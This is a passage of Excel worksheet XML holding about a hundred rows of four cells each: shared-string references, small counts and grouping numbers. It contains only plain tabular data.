    <row r="10100" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10100" t="s">
        <v>16230</v>
      </c>
      <c r="B10100" t="s">
        <v>16220</v>
      </c>
      <c r="C10100">
        <v>0</v>
      </c>
      <c r="D10100">
        <v>1960</v>
      </c>
    </row>
    <row r="10101" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10101" t="s">
        <v>16229</v>
      </c>
      <c r="B10101" t="s">
        <v>16221</v>
      </c>
      <c r="C10101">
        <v>10</v>
      </c>
      <c r="D10101">
        <v>1960</v>
      </c>
    </row>
    <row r="10102" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10102" t="s">
        <v>16230</v>
      </c>
      <c r="B10102" t="s">
        <v>16222</v>
      </c>
      <c r="C10102">
        <v>10</v>
      </c>
      <c r="D10102">
        <v>1960</v>
      </c>
    </row>
    <row r="10103" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10103" t="s">
        <v>16223</v>
      </c>
      <c r="B10103" t="s">
        <v>16223</v>
      </c>
      <c r="C10103">
        <v>22</v>
      </c>
      <c r="D10103">
        <v>1960</v>
      </c>
    </row>
    <row r="10104" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10104" t="s">
        <v>16224</v>
      </c>
      <c r="B10104" t="s">
        <v>16224</v>
      </c>
      <c r="C10104">
        <v>1</v>
      </c>
      <c r="D10104">
        <v>1960</v>
      </c>
    </row>
    <row r="10105" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10105" t="s">
        <v>16228</v>
      </c>
      <c r="B10105" t="s">
        <v>16211</v>
      </c>
      <c r="C10105">
        <v>0</v>
      </c>
      <c r="D10105">
        <v>2019</v>
      </c>
    </row>
    <row r="10106" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10106" t="s">
        <v>16231</v>
      </c>
      <c r="B10106" t="s">
        <v>16212</v>
      </c>
      <c r="C10106">
        <v>0</v>
      </c>
      <c r="D10106">
        <v>2019</v>
      </c>
    </row>
    <row r="10107" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10107" t="s">
        <v>16228</v>
      </c>
      <c r="B10107" t="s">
        <v>16213</v>
      </c>
      <c r="C10107">
        <v>0</v>
      </c>
      <c r="D10107">
        <v>2019</v>
      </c>
    </row>
    <row r="10108" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10108" t="s">
        <v>16231</v>
      </c>
      <c r="B10108" t="s">
        <v>16214</v>
      </c>
      <c r="C10108">
        <v>0</v>
      </c>
      <c r="D10108">
        <v>2019</v>
      </c>
    </row>
    <row r="10109" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10109" t="s">
        <v>16228</v>
      </c>
      <c r="B10109" t="s">
        <v>16215</v>
      </c>
      <c r="C10109">
        <v>0</v>
      </c>
      <c r="D10109">
        <v>2019</v>
      </c>
    </row>
    <row r="10110" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10110" t="s">
        <v>16231</v>
      </c>
      <c r="B10110" t="s">
        <v>16216</v>
      </c>
      <c r="C10110">
        <v>0</v>
      </c>
      <c r="D10110">
        <v>2019</v>
      </c>
    </row>
    <row r="10111" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10111" t="s">
        <v>16228</v>
      </c>
      <c r="B10111" t="s">
        <v>16217</v>
      </c>
      <c r="C10111">
        <v>0</v>
      </c>
      <c r="D10111">
        <v>2019</v>
      </c>
    </row>
    <row r="10112" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10112" t="s">
        <v>16231</v>
      </c>
      <c r="B10112" t="s">
        <v>16218</v>
      </c>
      <c r="C10112">
        <v>0</v>
      </c>
      <c r="D10112">
        <v>2019</v>
      </c>
    </row>
    <row r="10113" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10113" t="s">
        <v>16229</v>
      </c>
      <c r="B10113" t="s">
        <v>16219</v>
      </c>
      <c r="C10113">
        <v>0</v>
      </c>
      <c r="D10113">
        <v>2019</v>
      </c>
    </row>
    <row r="10114" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10114" t="s">
        <v>16230</v>
      </c>
      <c r="B10114" t="s">
        <v>16220</v>
      </c>
      <c r="C10114">
        <v>0</v>
      </c>
      <c r="D10114">
        <v>2019</v>
      </c>
    </row>
    <row r="10115" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10115" t="s">
        <v>16229</v>
      </c>
      <c r="B10115" t="s">
        <v>16221</v>
      </c>
      <c r="C10115">
        <v>0</v>
      </c>
      <c r="D10115">
        <v>2019</v>
      </c>
    </row>
    <row r="10116" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10116" t="s">
        <v>16230</v>
      </c>
      <c r="B10116" t="s">
        <v>16222</v>
      </c>
      <c r="C10116">
        <v>0</v>
      </c>
      <c r="D10116">
        <v>2019</v>
      </c>
    </row>
    <row r="10117" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10117" t="s">
        <v>16223</v>
      </c>
      <c r="B10117" t="s">
        <v>16223</v>
      </c>
      <c r="C10117">
        <v>0</v>
      </c>
      <c r="D10117">
        <v>2019</v>
      </c>
    </row>
    <row r="10118" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10118" t="s">
        <v>16224</v>
      </c>
      <c r="B10118" t="s">
        <v>16224</v>
      </c>
      <c r="C10118">
        <v>0</v>
      </c>
      <c r="D10118">
        <v>2019</v>
      </c>
    </row>
    <row r="10119" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10119" t="s">
        <v>16228</v>
      </c>
      <c r="B10119" t="s">
        <v>16211</v>
      </c>
      <c r="C10119">
        <v>0</v>
      </c>
      <c r="D10119">
        <v>4875</v>
      </c>
    </row>
    <row r="10120" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10120" t="s">
        <v>16231</v>
      </c>
      <c r="B10120" t="s">
        <v>16212</v>
      </c>
      <c r="C10120">
        <v>0</v>
      </c>
      <c r="D10120">
        <v>4875</v>
      </c>
    </row>
    <row r="10121" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10121" t="s">
        <v>16228</v>
      </c>
      <c r="B10121" t="s">
        <v>16213</v>
      </c>
      <c r="C10121">
        <v>0</v>
      </c>
      <c r="D10121">
        <v>4875</v>
      </c>
    </row>
    <row r="10122" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10122" t="s">
        <v>16231</v>
      </c>
      <c r="B10122" t="s">
        <v>16214</v>
      </c>
      <c r="C10122">
        <v>0</v>
      </c>
      <c r="D10122">
        <v>4875</v>
      </c>
    </row>
    <row r="10123" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10123" t="s">
        <v>16228</v>
      </c>
      <c r="B10123" t="s">
        <v>16215</v>
      </c>
      <c r="C10123">
        <v>1</v>
      </c>
      <c r="D10123">
        <v>4875</v>
      </c>
    </row>
    <row r="10124" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10124" t="s">
        <v>16231</v>
      </c>
      <c r="B10124" t="s">
        <v>16216</v>
      </c>
      <c r="C10124">
        <v>3</v>
      </c>
      <c r="D10124">
        <v>4875</v>
      </c>
    </row>
    <row r="10125" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10125" t="s">
        <v>16228</v>
      </c>
      <c r="B10125" t="s">
        <v>16217</v>
      </c>
      <c r="C10125">
        <v>6</v>
      </c>
      <c r="D10125">
        <v>4875</v>
      </c>
    </row>
    <row r="10126" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10126" t="s">
        <v>16231</v>
      </c>
      <c r="B10126" t="s">
        <v>16218</v>
      </c>
      <c r="C10126">
        <v>1</v>
      </c>
      <c r="D10126">
        <v>4875</v>
      </c>
    </row>
    <row r="10127" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10127" t="s">
        <v>16229</v>
      </c>
      <c r="B10127" t="s">
        <v>16219</v>
      </c>
      <c r="C10127">
        <v>0</v>
      </c>
      <c r="D10127">
        <v>4875</v>
      </c>
    </row>
    <row r="10128" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10128" t="s">
        <v>16230</v>
      </c>
      <c r="B10128" t="s">
        <v>16220</v>
      </c>
      <c r="C10128">
        <v>0</v>
      </c>
      <c r="D10128">
        <v>4875</v>
      </c>
    </row>
    <row r="10129" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10129" t="s">
        <v>16229</v>
      </c>
      <c r="B10129" t="s">
        <v>16221</v>
      </c>
      <c r="C10129">
        <v>4</v>
      </c>
      <c r="D10129">
        <v>4875</v>
      </c>
    </row>
    <row r="10130" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10130" t="s">
        <v>16230</v>
      </c>
      <c r="B10130" t="s">
        <v>16222</v>
      </c>
      <c r="C10130">
        <v>2</v>
      </c>
      <c r="D10130">
        <v>4875</v>
      </c>
    </row>
    <row r="10131" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10131" t="s">
        <v>16223</v>
      </c>
      <c r="B10131" t="s">
        <v>16223</v>
      </c>
      <c r="C10131">
        <v>24</v>
      </c>
      <c r="D10131">
        <v>4875</v>
      </c>
    </row>
    <row r="10132" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10132" t="s">
        <v>16224</v>
      </c>
      <c r="B10132" t="s">
        <v>16224</v>
      </c>
      <c r="C10132">
        <v>0</v>
      </c>
      <c r="D10132">
        <v>4875</v>
      </c>
    </row>
    <row r="10133" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10133" t="s">
        <v>16228</v>
      </c>
      <c r="B10133" t="s">
        <v>16211</v>
      </c>
      <c r="C10133">
        <v>0</v>
      </c>
      <c r="D10133">
        <v>4904</v>
      </c>
    </row>
    <row r="10134" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10134" t="s">
        <v>16231</v>
      </c>
      <c r="B10134" t="s">
        <v>16212</v>
      </c>
      <c r="C10134">
        <v>0</v>
      </c>
      <c r="D10134">
        <v>4904</v>
      </c>
    </row>
    <row r="10135" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10135" t="s">
        <v>16228</v>
      </c>
      <c r="B10135" t="s">
        <v>16213</v>
      </c>
      <c r="C10135">
        <v>0</v>
      </c>
      <c r="D10135">
        <v>4904</v>
      </c>
    </row>
    <row r="10136" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10136" t="s">
        <v>16231</v>
      </c>
      <c r="B10136" t="s">
        <v>16214</v>
      </c>
      <c r="C10136">
        <v>0</v>
      </c>
      <c r="D10136">
        <v>4904</v>
      </c>
    </row>
    <row r="10137" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10137" t="s">
        <v>16228</v>
      </c>
      <c r="B10137" t="s">
        <v>16215</v>
      </c>
      <c r="C10137">
        <v>4</v>
      </c>
      <c r="D10137">
        <v>4904</v>
      </c>
    </row>
    <row r="10138" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10138" t="s">
        <v>16231</v>
      </c>
      <c r="B10138" t="s">
        <v>16216</v>
      </c>
      <c r="C10138">
        <v>4</v>
      </c>
      <c r="D10138">
        <v>4904</v>
      </c>
    </row>
    <row r="10139" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10139" t="s">
        <v>16228</v>
      </c>
      <c r="B10139" t="s">
        <v>16217</v>
      </c>
      <c r="C10139">
        <v>32</v>
      </c>
      <c r="D10139">
        <v>4904</v>
      </c>
    </row>
    <row r="10140" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10140" t="s">
        <v>16231</v>
      </c>
      <c r="B10140" t="s">
        <v>16218</v>
      </c>
      <c r="C10140">
        <v>0</v>
      </c>
      <c r="D10140">
        <v>4904</v>
      </c>
    </row>
    <row r="10141" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10141" t="s">
        <v>16229</v>
      </c>
      <c r="B10141" t="s">
        <v>16219</v>
      </c>
      <c r="C10141">
        <v>0</v>
      </c>
      <c r="D10141">
        <v>4904</v>
      </c>
    </row>
    <row r="10142" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10142" t="s">
        <v>16230</v>
      </c>
      <c r="B10142" t="s">
        <v>16220</v>
      </c>
      <c r="C10142">
        <v>0</v>
      </c>
      <c r="D10142">
        <v>4904</v>
      </c>
    </row>
    <row r="10143" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10143" t="s">
        <v>16229</v>
      </c>
      <c r="B10143" t="s">
        <v>16221</v>
      </c>
      <c r="C10143">
        <v>32</v>
      </c>
      <c r="D10143">
        <v>4904</v>
      </c>
    </row>
    <row r="10144" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10144" t="s">
        <v>16230</v>
      </c>
      <c r="B10144" t="s">
        <v>16222</v>
      </c>
      <c r="C10144">
        <v>10</v>
      </c>
      <c r="D10144">
        <v>4904</v>
      </c>
    </row>
    <row r="10145" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10145" t="s">
        <v>16223</v>
      </c>
      <c r="B10145" t="s">
        <v>16223</v>
      </c>
      <c r="C10145">
        <v>20</v>
      </c>
      <c r="D10145">
        <v>4904</v>
      </c>
    </row>
    <row r="10146" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10146" t="s">
        <v>16224</v>
      </c>
      <c r="B10146" t="s">
        <v>16224</v>
      </c>
      <c r="C10146">
        <v>2</v>
      </c>
      <c r="D10146">
        <v>4904</v>
      </c>
    </row>
    <row r="10147" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10147" t="s">
        <v>16228</v>
      </c>
      <c r="B10147" t="s">
        <v>16211</v>
      </c>
      <c r="C10147">
        <v>0</v>
      </c>
      <c r="D10147">
        <v>4878</v>
      </c>
    </row>
    <row r="10148" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10148" t="s">
        <v>16231</v>
      </c>
      <c r="B10148" t="s">
        <v>16212</v>
      </c>
      <c r="C10148">
        <v>0</v>
      </c>
      <c r="D10148">
        <v>4878</v>
      </c>
    </row>
    <row r="10149" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10149" t="s">
        <v>16228</v>
      </c>
      <c r="B10149" t="s">
        <v>16213</v>
      </c>
      <c r="C10149">
        <v>0</v>
      </c>
      <c r="D10149">
        <v>4878</v>
      </c>
    </row>
    <row r="10150" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10150" t="s">
        <v>16231</v>
      </c>
      <c r="B10150" t="s">
        <v>16214</v>
      </c>
      <c r="C10150">
        <v>0</v>
      </c>
      <c r="D10150">
        <v>4878</v>
      </c>
    </row>
    <row r="10151" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10151" t="s">
        <v>16228</v>
      </c>
      <c r="B10151" t="s">
        <v>16215</v>
      </c>
      <c r="C10151">
        <v>1</v>
      </c>
      <c r="D10151">
        <v>4878</v>
      </c>
    </row>
    <row r="10152" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10152" t="s">
        <v>16231</v>
      </c>
      <c r="B10152" t="s">
        <v>16216</v>
      </c>
      <c r="C10152">
        <v>0</v>
      </c>
      <c r="D10152">
        <v>4878</v>
      </c>
    </row>
    <row r="10153" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10153" t="s">
        <v>16228</v>
      </c>
      <c r="B10153" t="s">
        <v>16217</v>
      </c>
      <c r="C10153">
        <v>1</v>
      </c>
      <c r="D10153">
        <v>4878</v>
      </c>
    </row>
    <row r="10154" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10154" t="s">
        <v>16231</v>
      </c>
      <c r="B10154" t="s">
        <v>16218</v>
      </c>
      <c r="C10154">
        <v>0</v>
      </c>
      <c r="D10154">
        <v>4878</v>
      </c>
    </row>
    <row r="10155" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10155" t="s">
        <v>16229</v>
      </c>
      <c r="B10155" t="s">
        <v>16219</v>
      </c>
      <c r="C10155">
        <v>15</v>
      </c>
      <c r="D10155">
        <v>4878</v>
      </c>
    </row>
    <row r="10156" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10156" t="s">
        <v>16230</v>
      </c>
      <c r="B10156" t="s">
        <v>16220</v>
      </c>
      <c r="C10156">
        <v>3</v>
      </c>
      <c r="D10156">
        <v>4878</v>
      </c>
    </row>
    <row r="10157" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10157" t="s">
        <v>16229</v>
      </c>
      <c r="B10157" t="s">
        <v>16221</v>
      </c>
      <c r="C10157">
        <v>30</v>
      </c>
      <c r="D10157">
        <v>4878</v>
      </c>
    </row>
    <row r="10158" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10158" t="s">
        <v>16230</v>
      </c>
      <c r="B10158" t="s">
        <v>16222</v>
      </c>
      <c r="C10158">
        <v>2</v>
      </c>
      <c r="D10158">
        <v>4878</v>
      </c>
    </row>
    <row r="10159" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10159" t="s">
        <v>16223</v>
      </c>
      <c r="B10159" t="s">
        <v>16223</v>
      </c>
      <c r="C10159">
        <v>25</v>
      </c>
      <c r="D10159">
        <v>4878</v>
      </c>
    </row>
    <row r="10160" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10160" t="s">
        <v>16224</v>
      </c>
      <c r="B10160" t="s">
        <v>16224</v>
      </c>
      <c r="C10160">
        <v>0</v>
      </c>
      <c r="D10160">
        <v>4878</v>
      </c>
    </row>
    <row r="10161" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10161" t="s">
        <v>16228</v>
      </c>
      <c r="B10161" t="s">
        <v>16211</v>
      </c>
      <c r="C10161">
        <v>0</v>
      </c>
      <c r="D10161">
        <v>1277</v>
      </c>
    </row>
    <row r="10162" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10162" t="s">
        <v>16231</v>
      </c>
      <c r="B10162" t="s">
        <v>16212</v>
      </c>
      <c r="C10162">
        <v>0</v>
      </c>
      <c r="D10162">
        <v>1277</v>
      </c>
    </row>
    <row r="10163" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10163" t="s">
        <v>16228</v>
      </c>
      <c r="B10163" t="s">
        <v>16213</v>
      </c>
      <c r="C10163">
        <v>0</v>
      </c>
      <c r="D10163">
        <v>1277</v>
      </c>
    </row>
    <row r="10164" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10164" t="s">
        <v>16231</v>
      </c>
      <c r="B10164" t="s">
        <v>16214</v>
      </c>
      <c r="C10164">
        <v>0</v>
      </c>
      <c r="D10164">
        <v>1277</v>
      </c>
    </row>
    <row r="10165" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10165" t="s">
        <v>16228</v>
      </c>
      <c r="B10165" t="s">
        <v>16215</v>
      </c>
      <c r="C10165">
        <v>2</v>
      </c>
      <c r="D10165">
        <v>1277</v>
      </c>
    </row>
    <row r="10166" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10166" t="s">
        <v>16231</v>
      </c>
      <c r="B10166" t="s">
        <v>16216</v>
      </c>
      <c r="C10166">
        <v>0</v>
      </c>
      <c r="D10166">
        <v>1277</v>
      </c>
    </row>
    <row r="10167" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10167" t="s">
        <v>16228</v>
      </c>
      <c r="B10167" t="s">
        <v>16217</v>
      </c>
      <c r="C10167">
        <v>5</v>
      </c>
      <c r="D10167">
        <v>1277</v>
      </c>
    </row>
    <row r="10168" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10168" t="s">
        <v>16231</v>
      </c>
      <c r="B10168" t="s">
        <v>16218</v>
      </c>
      <c r="C10168">
        <v>0</v>
      </c>
      <c r="D10168">
        <v>1277</v>
      </c>
    </row>
    <row r="10169" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10169" t="s">
        <v>16229</v>
      </c>
      <c r="B10169" t="s">
        <v>16219</v>
      </c>
      <c r="C10169">
        <v>0</v>
      </c>
      <c r="D10169">
        <v>1277</v>
      </c>
    </row>
    <row r="10170" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10170" t="s">
        <v>16230</v>
      </c>
      <c r="B10170" t="s">
        <v>16220</v>
      </c>
      <c r="C10170">
        <v>0</v>
      </c>
      <c r="D10170">
        <v>1277</v>
      </c>
    </row>
    <row r="10171" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10171" t="s">
        <v>16229</v>
      </c>
      <c r="B10171" t="s">
        <v>16221</v>
      </c>
      <c r="C10171">
        <v>0</v>
      </c>
      <c r="D10171">
        <v>1277</v>
      </c>
    </row>
    <row r="10172" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10172" t="s">
        <v>16230</v>
      </c>
      <c r="B10172" t="s">
        <v>16222</v>
      </c>
      <c r="C10172">
        <v>0</v>
      </c>
      <c r="D10172">
        <v>1277</v>
      </c>
    </row>
    <row r="10173" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10173" t="s">
        <v>16223</v>
      </c>
      <c r="B10173" t="s">
        <v>16223</v>
      </c>
      <c r="C10173">
        <v>26</v>
      </c>
      <c r="D10173">
        <v>1277</v>
      </c>
    </row>
    <row r="10174" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10174" t="s">
        <v>16224</v>
      </c>
      <c r="B10174" t="s">
        <v>16224</v>
      </c>
      <c r="C10174">
        <v>0</v>
      </c>
      <c r="D10174">
        <v>1277</v>
      </c>
    </row>
    <row r="10175" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10175" t="s">
        <v>16228</v>
      </c>
      <c r="B10175" t="s">
        <v>16217</v>
      </c>
      <c r="C10175">
        <v>367</v>
      </c>
      <c r="D10175">
        <v>452</v>
      </c>
    </row>
    <row r="10176" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10176" t="s">
        <v>16231</v>
      </c>
      <c r="B10176" t="s">
        <v>16218</v>
      </c>
      <c r="C10176">
        <v>18</v>
      </c>
      <c r="D10176">
        <v>452</v>
      </c>
    </row>
    <row r="10177" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10177" t="s">
        <v>16228</v>
      </c>
      <c r="B10177" t="s">
        <v>16211</v>
      </c>
      <c r="C10177">
        <v>0</v>
      </c>
      <c r="D10177">
        <v>1102</v>
      </c>
    </row>
    <row r="10178" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10178" t="s">
        <v>16231</v>
      </c>
      <c r="B10178" t="s">
        <v>16212</v>
      </c>
      <c r="C10178">
        <v>0</v>
      </c>
      <c r="D10178">
        <v>1102</v>
      </c>
    </row>
    <row r="10179" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10179" t="s">
        <v>16228</v>
      </c>
      <c r="B10179" t="s">
        <v>16213</v>
      </c>
      <c r="C10179">
        <v>0</v>
      </c>
      <c r="D10179">
        <v>1102</v>
      </c>
    </row>
    <row r="10180" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10180" t="s">
        <v>16231</v>
      </c>
      <c r="B10180" t="s">
        <v>16214</v>
      </c>
      <c r="C10180">
        <v>0</v>
      </c>
      <c r="D10180">
        <v>1102</v>
      </c>
    </row>
    <row r="10181" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10181" t="s">
        <v>16228</v>
      </c>
      <c r="B10181" t="s">
        <v>16215</v>
      </c>
      <c r="C10181">
        <v>2</v>
      </c>
      <c r="D10181">
        <v>1102</v>
      </c>
    </row>
    <row r="10182" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10182" t="s">
        <v>16231</v>
      </c>
      <c r="B10182" t="s">
        <v>16216</v>
      </c>
      <c r="C10182">
        <v>3</v>
      </c>
      <c r="D10182">
        <v>1102</v>
      </c>
    </row>
    <row r="10183" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10183" t="s">
        <v>16228</v>
      </c>
      <c r="B10183" t="s">
        <v>16217</v>
      </c>
      <c r="C10183">
        <v>2</v>
      </c>
      <c r="D10183">
        <v>1102</v>
      </c>
    </row>
    <row r="10184" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10184" t="s">
        <v>16231</v>
      </c>
      <c r="B10184" t="s">
        <v>16218</v>
      </c>
      <c r="C10184">
        <v>2</v>
      </c>
      <c r="D10184">
        <v>1102</v>
      </c>
    </row>
    <row r="10185" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10185" t="s">
        <v>16229</v>
      </c>
      <c r="B10185" t="s">
        <v>16219</v>
      </c>
      <c r="C10185">
        <v>10</v>
      </c>
      <c r="D10185">
        <v>1102</v>
      </c>
    </row>
    <row r="10186" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10186" t="s">
        <v>16230</v>
      </c>
      <c r="B10186" t="s">
        <v>16220</v>
      </c>
      <c r="C10186">
        <v>0</v>
      </c>
      <c r="D10186">
        <v>1102</v>
      </c>
    </row>
    <row r="10187" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10187" t="s">
        <v>16229</v>
      </c>
      <c r="B10187" t="s">
        <v>16221</v>
      </c>
      <c r="C10187">
        <v>10</v>
      </c>
      <c r="D10187">
        <v>1102</v>
      </c>
    </row>
    <row r="10188" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10188" t="s">
        <v>16230</v>
      </c>
      <c r="B10188" t="s">
        <v>16222</v>
      </c>
      <c r="C10188">
        <v>5</v>
      </c>
      <c r="D10188">
        <v>1102</v>
      </c>
    </row>
    <row r="10189" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10189" t="s">
        <v>16223</v>
      </c>
      <c r="B10189" t="s">
        <v>16223</v>
      </c>
      <c r="C10189">
        <v>7</v>
      </c>
      <c r="D10189">
        <v>1102</v>
      </c>
    </row>
    <row r="10190" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10190" t="s">
        <v>16224</v>
      </c>
      <c r="B10190" t="s">
        <v>16224</v>
      </c>
      <c r="C10190">
        <v>0</v>
      </c>
      <c r="D10190">
        <v>1102</v>
      </c>
    </row>
    <row r="10191" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10191" t="s">
        <v>16228</v>
      </c>
      <c r="B10191" t="s">
        <v>16211</v>
      </c>
      <c r="C10191">
        <v>0</v>
      </c>
      <c r="D10191">
        <v>1296</v>
      </c>
    </row>
    <row r="10192" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10192" t="s">
        <v>16231</v>
      </c>
      <c r="B10192" t="s">
        <v>16212</v>
      </c>
      <c r="C10192">
        <v>0</v>
      </c>
      <c r="D10192">
        <v>1296</v>
      </c>
    </row>
    <row r="10193" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10193" t="s">
        <v>16228</v>
      </c>
      <c r="B10193" t="s">
        <v>16213</v>
      </c>
      <c r="C10193">
        <v>0</v>
      </c>
      <c r="D10193">
        <v>1296</v>
      </c>
    </row>
    <row r="10194" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10194" t="s">
        <v>16231</v>
      </c>
      <c r="B10194" t="s">
        <v>16214</v>
      </c>
      <c r="C10194">
        <v>0</v>
      </c>
      <c r="D10194">
        <v>1296</v>
      </c>
    </row>
    <row r="10195" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10195" t="s">
        <v>16228</v>
      </c>
      <c r="B10195" t="s">
        <v>16215</v>
      </c>
      <c r="C10195">
        <v>1</v>
      </c>
      <c r="D10195">
        <v>1296</v>
      </c>
    </row>
    <row r="10196" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10196" t="s">
        <v>16231</v>
      </c>
      <c r="B10196" t="s">
        <v>16216</v>
      </c>
      <c r="C10196">
        <v>1</v>
      </c>
      <c r="D10196">
        <v>1296</v>
      </c>
    </row>
    <row r="10197" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10197" t="s">
        <v>16228</v>
      </c>
      <c r="B10197" t="s">
        <v>16217</v>
      </c>
      <c r="C10197">
        <v>10</v>
      </c>
      <c r="D10197">
        <v>1296</v>
      </c>
    </row>
    <row r="10198" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10198" t="s">
        <v>16231</v>
      </c>
      <c r="B10198" t="s">
        <v>16218</v>
      </c>
      <c r="C10198">
        <v>3</v>
      </c>
      <c r="D10198">
        <v>1296</v>
      </c>
    </row>
    <row r="10199" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10199" t="s">
        <v>16229</v>
      </c>
      <c r="B10199" t="s">
        <v>16219</v>
      </c>
      <c r="C10199">
        <v>0</v>
      </c>
      <c r="D10199">
        <v>1296</v>
      </c>
    </row>
    <row r="10200" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10200" t="s">
        <v>16230</v>
      </c>
      <c r="B10200" t="s">
        <v>16220</v>
      </c>
      <c r="C10200">
        <v>0</v>
      </c>
      <c r="D10200">
        <v>1296</v>
      </c>
    </row>
    <row r="10201" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10201" t="s">
        <v>16229</v>
      </c>
      <c r="B10201" t="s">
        <v>16221</v>
      </c>
      <c r="C10201">
        <v>7</v>
      </c>
      <c r="D10201">
        <v>1296</v>
      </c>
    </row>
    <row r="10202" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10202" t="s">
        <v>16230</v>
      </c>
      <c r="B10202" t="s">
        <v>16222</v>
      </c>
      <c r="C10202">
        <v>0</v>
      </c>
      <c r="D10202">
        <v>1296</v>
      </c>
    </row>
    <row r="10203" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10203" t="s">
        <v>16223</v>
      </c>
      <c r="B10203" t="s">
        <v>16223</v>
      </c>
      <c r="C10203">
        <v>25</v>
      </c>
      <c r="D10203">
        <v>1296</v>
      </c>
    </row>
    <row r="10204" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10204" t="s">
        <v>16224</v>
      </c>
      <c r="B10204" t="s">
        <v>16224</v>
      </c>
      <c r="C10204">
        <v>1</v>
      </c>
      <c r="D10204">
